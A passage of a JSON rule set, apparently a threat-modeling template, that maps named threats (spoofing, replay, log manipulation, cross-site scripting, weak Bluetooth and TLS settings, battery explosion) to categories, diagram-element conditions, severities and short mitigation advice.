process.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ab65566e-a317-4e67-b647-d79ac948a62b","Name":"Spoofing the external entity","Description":"The external entity may be spoofed by an attacker and this may lead to unauthorized access to the receiver process. Consider using a standard authentication mechanism to identify the external entity.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"87e896bb-eb2e-4481-801b-a11d31a4e5e3","Name":"Spoofing of source data store","Description":"The data store may be spoofed by an attacker and this may lead to incorrect data delivered to the receiver. Consider using a standard authentication mechanism to identify the source data store.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"38053480-8db1-4185-adcc-9ebb5b913bef","Name":"Spoofing of destination data store","Description":"The data store may be spoofed by an attacker and this may lead to data being written to the attacker\'s target instead of the data store. Consider using a standard authentication mechanism to identify the destination data store.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"4440ba48-7d42-44cd-b5de-f6664ccc6259","Name":"Replay attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"4e007b60-94e7-4df3-b3bd-109eb8627da2","ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"1fec597f-dfd0-4fcc-b348-828307b946ee","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"240eabff-0c74-40e7-9748-d4cc46f59403","Name":"Log manipulation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c7598413-4382-43e9-9904-fd9d877eb7a9","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":3,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"PhyElementRest":{"Property":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}}}]},"Severity":2},{"ID":"ef5ee1a2-c3b4-492d-b7be-d2285f10107c","Name":"Risks from logging","Description":"Log readers can come under attack via log files. Consider ways to canonicalize data in all logs. Implement a single reader for the logs, if possible, in order to reduce attack surface area. Be sure to understand and document log file elements which come from untrusted sources.","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}}]}},{"ID":"ad30b363-be03-41a8-a422-3ad63cb077b1","Name":"JSON Processing","Description":"If a dataflow contains JSON, JSON processing and hijacking threats may be exploited.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"b395ada9-bc1d-4df9-b9f3-a1b09ee2a5aa","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"758fa1ec-35f3-44a2-9f3d-0e5c21fc92c4","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"a727e065-ff95-47d5-8aac-625dfc7a453c","Name":"Cross Site Scripting","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b48781b2-24a2-481b-b7c1-3390dbeeb973","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59076fab-74e3-415a-93f5-fffd12e3d79c","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"47889e58-6875-4fe5-aa04-91ea9054a166","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"5afac92d-d86d-49bc-8fd8-84242a651767","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"596fe057-9387-4f5c-bd01-ef81613739f4","Name":"Lower trusted subject updates logs","Description":"If you have trust levels, is anyone other outside of the highest trust level allowed to log? Letting everyone write to your logs can lead to repudiation problems. Only allow trusted code to log.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"3517184d-2795-45e8-8dde-667eb7aa8051","Name":"Data logs from unknown source","Description":"If you have trust levels, is anyone other outside of the highest trust level allowed to log? Letting everyone write to your logs can lead to repudiation problems. Only allow trusted code to log.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"ee25afa7-0267-4f20-96bb-9912494a383e","Name":"Insufficient auditing","Description":"Does the log capture enough data to understand what happened in the past? Do your logs capture enough data to understand an incident after the fact? Is such capture lightweight enough to be left on all the time? Do you have enough data to deal with repudiation claims? Make sure you log sufficient and appropriate data to handle a repudiation claims. You might want to talk to an audit expert as well as a privacy expert about your choice of data.","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a74ba004-2165-4721-9b9b-2ce4b9df88c2","DetailRestrictions":[]}},{"ID":"df93be9d-b184-4ee1-a1d0-4966c03721fc","Name":"Potential data repudiation","Description":"The receiver claims that it did not receive data from a source outside the trust boundary. Consider using logging or auditing to record the source, time, and summary of the received data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":1},{"ID":"8cc8d956-c72b-478c-88ba-e3dd362825a1","Name":"External entity potentially denies receiving data","Description":"The receiver claims that it did not receive data from a process on the other side of the trust boundary. Consider using logging or auditing to record the source, time, and summary of the received data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":1},{"ID":"6e270c51-65fe-497d-baaa-e390617e27a6","Name":"Data store denies potentially writing data","Description":"The receiver claims that it did not write data received from an entity on the other side of the trust boundary. Consider using logging or auditing to record the source, time, and summary of the received data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"12c29b20-0467-40ab-9208-2c01d6142eab","Name":"Authorization bypass","Description":"Custom authentication schemes are susceptible to common weaknesses such as weak credential change management, credential equivalence, easily guessable credentials, null credentials, downgrade authentication or a weak credential change management system. Consider the impact and potential mitigations for your custom authentication scheme.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c8a14b27-b13f-4358-9f3f-691d01c97c77"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"e0b99432-98a6-4e32-86d7-ca5f58897cc2","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"eb92cc8a-bceb-48a5-b0fd-0894a1d91c5c","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"b0d91b9a-111b-464b-8011-3e02defafe1d","Name":"Data store inaccessible","Description":"An external agent prevents access to a data store on the other side of the trust boundary.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"c7787e71-5c70-462c-9558-ce20e7cfdfe8","ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"063b7019-22aa-4eb8-8e6f-9f81dbeb513b","Name":"Eavesdropping","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","61d04f2d-83b1-4152-9aba-4ad188eef06d","bcd08af5-29bf-4ed8-ab6c-e311e88f4c84","7bbfe5d3-8a91-4210-99ab-79f670715e61"],"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b"},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4b7a61d0-c430-48ea-8730-03a81542a5d8","DetailRestrictions":[]},"Severity":3},{"ID":"df2c1c56-e04e-4b33-aae2-e13c9305a370","Name":"Privacy-violating interaction","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","af3ee78e-9e83-4bd1-b9b5-13ec28765518"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4b7a61d0-c430-48ea-8730-03a81542a5d8","DetailRestrictions":[]},"Severity":3},{"ID":"14a5667b-7aa9-41ef-82d1-c2a4e8e454aa","Name":"Processing of sensitive data","Description":"Personal information such as talks, coughs, etc. is exposed and processed by an external system","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","d6eafa9e-6d9d-42aa-a734-0eb11f25607b","e6ba8518-0074-492c-95e5-ebe89fa601fe","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":0,"NodeTypes":[{"TypeIDs":["4b7a61d0-c430-48ea-8730-03a81542a5d8"]},{"TypeIDs":[]}],"NodeRestrictions":[]},"Severity":4},{"ID":"94f3da7c-2e51-4025-9521-d91bf790cdea","Name":"Exposure of sensitive data","Description":"The loudspeaker discloses sensitive information in the public","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","af3ee78e-9e83-4bd1-b9b5-13ec28765518","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["210ba217-67da-4bda-9063-3c95716eb5b9"]}],"NodeRestrictions":[]},"Severity":4},{"ID":"1cd3c1af-ff49-461f-9f55-fadb851a0893","Name":"Risk of explosion","Description":"The battery may explode","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["bc4b439c-6197-48d3-a308-7fd323d2ea5e","6b8c08cb-3f02-413a-96b4-179bb1f67997","17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"1dc32bac-147f-42a4-a13c-44e5b59f7b81","DetailRestrictions":[]},"Severity":3},{"ID":"ea2ba48d-b7f9-42c9-b9d9-f4a9816383b0","Name":"Unsecure mode","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4338e868-4e3c-4473-ba27-6148e8b1fc0f","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"7f6ca653-a703-480c-b5d8-d82243171994","Name":"Missing user authentication","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1e3a8fb8-4a34-44be-8168-996a7e0283f1","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"289c20cd-ea84-4375-8453-b045b94e1dc6","Name":"Weak cryptographic algorithms","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"3f4c724d-3d4d-4b6b-9252-ef43b4240d79","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"3a44327d-24d1-4c53-a3ea-7d891fb86f47","Name":"Missing certificate","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"34344cae-d072-4901-a7be-4084a2534b45","ComparisonType":"==","Value":false}}]}},{"ID":"ea738f65-e0e7-4dc1-93b9-8798c4c8eeaf","Name":"Unsecure protocols","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"31f89637-4b8a-41e9-acac-9d012767a424","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9ea829dc-59d5-437c-8d24-9908feac2941","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"6ffb7af3-466f-4cb7-965e-d60956b2ae7e","Name":"Unsecure SSL/TLS version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"aa99758d-30a6-4e0f-9d11-1d46c0f43d6c","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"b2c6473b-9498-4b23-a02f-13e3818496d0","Name":"Exposes server version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6faf97a0-6039-4b7b-ba7c-6b9ef003ede3","ComparisonType":"==","Value":true}}]},"Severity":1},{"ID":"ca66721c-381d-43a1-9129-7643f04065d3","Name":"Missing patches","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"defc6bcc-2bc9-457a-abab-666ec78d4f73","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ff998b64-8348-4f41-8350-22ad07c68448","Name":"Missing web application firewall","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6f65b93f-53ad-424f-a81b-4777ad48ec97","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a1ac559b-0ed9-4e5c-815d-80d6dc23308e","Name":"Unsecure Bluetooth version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"80419a47-0ac7-488f-b958-da045b67d91f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"132c57c4-fe66-4c94-95e3-98a67669a4a5","Name":"Unsecure Bluetooth mode","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"04d5f07e-2482-451b-9e24-94cb650da53b","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cf1429d9-c9e7-4dc4-a54c-42596f246692","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"c9be8d05-1ea5-4947-a786-33b505f2c5fd","Name":"Unsecure Bluetooth level","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a4f10f42-4b29-4cbf-a849-0844b011609b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"56e4871b-bcb7-48f6-bd9e-5a8273d0b62c","Name":"Network access","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackVectorID":"3162421f-ca5b-400d-bbe8-58a510be9abf"},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8fbc9cce-7d30-425a-ac50-c5ca44d206b0","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"d9290f90-aa79-432f-92e0-267226771aea","Name":"Outdated protocol","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b"],"AttackVectorID":"04d5f07e-2482-451b-9e24-94cb650da53b"},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f7509951-f156-4774-89e9-1966b03ef03e","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"961c5b9f-ea27-48ec-b526-514636536540","Name":"Weak cryptographic algorithms","Description":"Some Bluetooth versions use weak cryptographic algorithms","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c"},"overridenRuleIDs":[],"RuleType":4,"ProtocolRestriction":{"protocolID":"f805dd78-eac2-4967-8dfc-231605a75ace","DetailRestrictions":[]},"Severity":2},{"ID":"b76247eb-309c-4fad-9a8c-28fea0a98555","Name":"Exposure of personal information","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"dffbfc0a-850b-4de0-95fb-ab9ea4273d88","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"13649f62-1bd6-4b50-9646-a9df988262a5","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"b9b2fbaa-be5c-48ca-bddc-6d4cb5989f96","Name":"Human 